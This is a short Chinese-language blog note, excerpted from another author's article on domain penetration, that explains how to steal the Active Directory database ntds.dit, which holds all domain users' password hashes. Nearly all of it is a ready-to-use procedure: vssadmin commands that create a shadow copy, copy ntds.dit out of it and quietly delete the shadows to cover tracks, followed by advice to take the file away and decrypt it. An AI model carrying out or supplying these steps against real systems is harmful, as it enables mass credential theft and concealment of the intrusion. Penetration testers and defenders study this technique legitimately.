本文是看Uknow大佬的文章,选其中一部分copy出来的。

原文链接:https://uknowsec.cn/posts/notes/域渗透-获取NTDS.dit.html

Ntds.dit介绍

Ntds.dit是主要的AD数据库,包括有关域用户,组和组成员身份的信息。它还包括域中所有用户的密码哈希值。为了进一步保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。

vssadmin获取Ntds

vssadmin域环境默认安装
支持系统:

  1. Server 2008
  2. Server 2012

方法

1、查询当前系统的快照

  1. vssadmin list shadows

2、创建快照(在C盘)

  1. vssadmin create shadow /for=c:

VSS获取NTDS.dit的方法 - 图1
获得Shadow Copy Volume Name为\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2

3、复制ntds.dit

  1. copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\NTDS\ntds.dit c:\ntds.dit

4、删除快照

  1. vssadmin delete shadows /for=c: /quiet

VSS获取NTDS.dit的方法 - 图2
完了就直接把c:\ntds.dit复制出来解密就好